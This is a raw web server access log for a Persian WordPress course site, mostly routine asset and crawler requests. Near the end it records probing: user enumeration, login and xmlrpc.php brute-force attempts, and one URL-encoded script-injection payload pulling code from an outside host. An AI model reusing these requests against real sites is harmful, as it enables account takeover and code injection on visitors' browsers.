115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-Medium.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANSansX/IRANSansX-Bold.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?ver=1.2.1 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.28.3 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/js/view/general.min.js?ver=6.1.11 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/uploads/essential-addons-elementor/eael-35334.js?ver=1740095127 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementskit-lite/libs/framework/assets/js/frontend-script.js?ver=3.5.0 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/uploads/essential-addons-elementor/eael-18728.js?ver=1740095127 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/js/widget-scripts.js?ver=3.5.0 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.28.3 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.28.4 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.28.4 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.28.3 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.28.4 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/jet-blocks/assets/js/jet-blocks.min.js?ver=1.3.18 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.28.3 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/js/animate-circle.min.js?ver=3.5.0 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/jet-elements/assets/js/jet-elements.min.js?ver=2.7.5.1 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementskit-lite/widgets/init/assets/js/elementor.js?ver=3.5.0 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Black.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/uploads/2020/12/logo2.png HTTP/1.1" 304 0 "https://optimyar.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/uploads/2022/03/Untitled-1-1.png HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Medium.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/persian-elementor/includes/icons/efaicons/fonts/efaicons.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/Tanha/Tanha.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Regular.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/uploads/2022/11/optimization-and-operations-research-1.mp4 HTTP/1.1" 206 2 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:32 +0330] "GET /wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.36.0 HTTP/1.1" 200 99440 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-brands-400.woff2 HTTP/1.1" 200 81612 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 78196 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Light.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/wpdiscuz/assets/third-party/font-awesome-5.13.0/webfonts/fa-solid-900.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:34 +0330] "GET /wp-content/plugins/wpdiscuz/assets/third-party/font-awesome-5.13.0/webfonts/fa-brands-400.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/fonts/elementskit.woff?y24e1e HTTP/1.1" 200 459560 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-regular-400.woff2 HTTP/1.1" 200 13276 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:33 +0330] "GET /wp-content/uploads/2022/11/optimization-and-operations-research-1.mp4 HTTP/1.1" 206 161915 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:34 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-ExtraBlack.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:34 +0330] "GET /wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.3 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
142.186.154.190 - - [02/May/2025:16:01:48 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/share-buttons.63d984f8c96d1e053bc0.bundle.min.js HTTP/1.1" 200 690 "https://optimyar.com/courses/python-optimization-with-cplex-gurobi/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
142.186.154.190 - - [02/May/2025:16:01:48 +0330] "GET /wp-content/plugins/elementor/assets/js/text-editor.c084ef86600b6f11690d.bundle.min.js HTTP/1.1" 200 621 "https://optimyar.com/courses/python-optimization-with-cplex-gurobi/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
142.186.154.190 - - [02/May/2025:16:01:48 +0330] "GET /wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.28.4 HTTP/1.1" 200 1072 "https://optimyar.com/courses/python-optimization-with-cplex-gurobi/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
142.186.154.190 - - [02/May/2025:16:01:48 +0330] "GET /wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.36.0 HTTP/1.1" 200 99440 "https://optimyar.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.36.0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
142.186.154.190 - - [02/May/2025:16:01:48 +0330] "GET /wp-content/uploads/2021/10/cropped-logo1-32x32.png HTTP/1.1" 200 2372 "https://optimyar.com/courses/python-optimization-with-cplex-gurobi/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
142.186.154.190 - - [02/May/2025:16:01:57 +0330] "GET /wp-content/uploads/2022/11/man.svg HTTP/1.1" 200 2534 "https://optimyar.com/courses/python-optimization-with-cplex-gurobi/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
142.186.154.190 - - [02/May/2025:16:01:57 +0330] "GET /wp-content/uploads/2022/11/pointer.svg HTTP/1.1" 200 1067 "https://optimyar.com/courses/python-optimization-with-cplex-gurobi/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
142.186.154.190 - - [02/May/2025:16:01:57 +0330] "GET /wp-content/uploads/2022/11/attention.svg HTTP/1.1" 200 16245 "https://optimyar.com/courses/python-optimization-with-cplex-gurobi/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
142.186.154.190 - - [02/May/2025:16:02:07 +0330] "GET /wp-content/uploads/2022/08/%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-%D8%B1%DB%8C%D8%B2%DB%8C-%D8%B1%DB%8C%D8%A7%D8%B6%DB%8C.png HTTP/1.1" 200 189587 "https://optimyar.com/courses/python-optimization-with-cplex-gurobi/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
142.186.154.190 - - [02/May/2025:16:02:07 +0330] "GET /wp-content/uploads/2022/08/%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%DA%AF%D9%85%D8%B2-1-1024x396.png HTTP/1.1" 200 294972 "https://optimyar.com/courses/python-optimization-with-cplex-gurobi/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
142.186.154.190 - - [02/May/2025:16:02:07 +0330] "GET /wp-content/uploads/2022/08/%D8%A8%D8%B1%D9%86%D8%A7%D9%85%D9%87-%D8%B1%DB%8C%D8%B2%DB%8C-%D8%AF%D8%B1-%D8%B9%D8%AF%D9%85-%D9%82%D8%B7%D8%B9%DB%8C%D8%AA-1-1024x396.png HTTP/1.1" 200 314102 "https://optimyar.com/courses/python-optimization-with-cplex-gurobi/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
4.157.241.124 - - [02/May/2025:16:04:39 +0330] "GET /wp-content/uploads/2024/07/Artboard-1-copy-6-scaled.jpg HTTP/1.1" 200 78944 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
115.64.210.61 - - [02/May/2025:16:05:34 +0330] "GET /wp-content/plugins/wpdiscuz/assets/third-party/font-awesome-5.13.0/webfonts/fa-regular-400.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:34 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/nav-menu.a23fbd67486c5bedf26c.bundle.min.js HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:34 +0330] "GET /wp-content/plugins/elementor-pro/assets/js/share-buttons.63d984f8c96d1e053bc0.bundle.min.js HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:34 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-UltraLight.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:34 +0330] "GET /wp-content/plugins/elementor/assets/js/text-editor.c084ef86600b6f11690d.bundle.min.js HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:34 +0330] "GET /wp-content/uploads/2022/11/optimization-and-operations-research-1.mp4 HTTP/1.1" 206 1049684 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:34 +0330] "GET /wp-content/plugins/persian-elementor/assets/css/font/IRANYekanX/IRANYekanX-Heavy.woff2 HTTP/1.1" 304 0 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
115.64.210.61 - - [02/May/2025:16:05:34 +0330] "GET /wp-content/uploads/2022/11/optimization-and-operations-research-1.mp4 HTTP/1.1" 206 835789 "https://optimyar.com/courses/optimization-and-operations-research/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/22E240 Safari/604.1"
156.228.176.231 - - [02/May/2025:16:06:44 +0330] "GET /wp-login.php HTTP/1.1" 302 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.176.231 - - [02/May/2025:16:06:51 +0330] "GET /wp-login.php HTTP/1.1" 302 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.176.231 - - [02/May/2025:16:06:53 +0330] "GET /not-found HTTP/1.1" 301 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.176.231 - - [02/May/2025:16:06:55 +0330] "GET /not-found/ HTTP/1.1" 404 15809 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
3.224.62.45 - - [02/May/2025:16:14:00 +0330] "GET /robots.txt HTTP/1.1" 200 123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; PerplexityBot/1.0; +https://perplexity.ai/perplexitybot)"
115.64.210.61 - - [02/May/2025:16:05:39 +0330] "GET /wp-content/uploads/2021/10/cropped-logo1-192x192.png HTTP/2" 304 0 "-" "Telegram/30606 CFNetwork/3826.500.111.2.2 Darwin/24.4.0"
173.252.87.116 - - [02/May/2025:16:05:52 +0330] "GET /robots.txt HTTP/2" 200 0 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
156.228.176.231 - - [02/May/2025:16:06:31 +0330] "GET /wp-json/wp/v2/users HTTP/1.1" 401 166 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.176.231 - - [02/May/2025:16:06:34 +0330] "GET /?author=1 HTTP/1.1" 404 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.176.231 - - [02/May/2025:16:06:37 +0330] "POST /xmlrpc.php HTTP/1.1" 200 132 "-" "Apache-HttpClient/4.5.13 (Java/11.0.26)"
156.228.176.231 - - [02/May/2025:16:06:39 +0330] "POST /xmlrpc.php HTTP/1.1" 200 245 "-" "Apache-HttpClient/4.5.13 (Java/11.0.26)"
156.228.176.231 - - [02/May/2025:16:06:46 +0330] "GET /not-found HTTP/1.1" 301 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.176.231 - - [02/May/2025:16:06:48 +0330] "GET /not-found/ HTTP/1.1" 404 15809 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
4.157.241.124 - - [02/May/2025:16:07:32 +0330] "GET /wp-content/uploads/2024/07/Artboard-1-copy-3-scaled.jpg HTTP/1.1" 200 83104 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
31.214.174.196 - - [02/May/2025:16:13:56 +0330] "POST /wp-cron.php?doing_wp_cron=1746189836.2189569473266601562500 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
18.97.9.97 - - [02/May/2025:16:13:53 +0330] "GET /courses/data-driven-robust-optimization/ HTTP/1.1" 200 43726 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; PerplexityBot/1.0; +https://perplexity.ai/perplexitybot)"
31.214.174.196 - - [02/May/2025:16:16:15 +0330] "POST /wp-cron.php?doing_wp_cron=1746189975.1475510597229003906250 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
156.228.171.235 - - [02/May/2025:16:16:13 +0330] "GET /wp-json/wp/v2/users HTTP/1.1" 401 166 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.171.235 - - [02/May/2025:16:16:22 +0330] "POST /xmlrpc.php HTTP/1.1" 200 245 "-" "Apache-HttpClient/4.5.13 (Java/11.0.26)"
156.228.171.235 - - [02/May/2025:16:16:27 +0330] "GET /not-found HTTP/1.1" 301 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.171.235 - - [02/May/2025:16:16:29 +0330] "GET /not-found/ HTTP/1.1" 404 15809 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.171.235 - - [02/May/2025:16:16:33 +0330] "GET /wp-login.php HTTP/1.1" 302 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.171.235 - - [02/May/2025:16:16:35 +0330] "GET /not-found HTTP/1.1" 301 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
94.102.49.19 - - [02/May/2025:16:17:24 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6632 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
156.228.171.235 - - [02/May/2025:16:16:17 +0330] "GET /?author=1 HTTP/1.1" 404 20 "https://www.google.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
156.228.171.235 - - [02/May/2025:16:16:20 +0330] "POST /xmlrpc.php HTTP/1.1" 200 132 "-" "Apache-HttpClient/4.5.13 (Java/11.0.26)"
